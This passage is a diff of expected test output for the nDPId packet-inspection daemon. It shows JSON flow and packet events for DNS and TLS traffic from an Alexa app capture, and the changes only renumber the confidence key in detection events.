00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1490976114879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976114879,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWl1AAEARM1WsECrYrBAqAVG6ADUALQ0pp4sBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1490976114880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976114880,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR3zxAAEARrmWsECoBrBAq2AA1UboAPYqqp4uBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAoABDRe6IY="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -620,42 +620,42 @@ 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 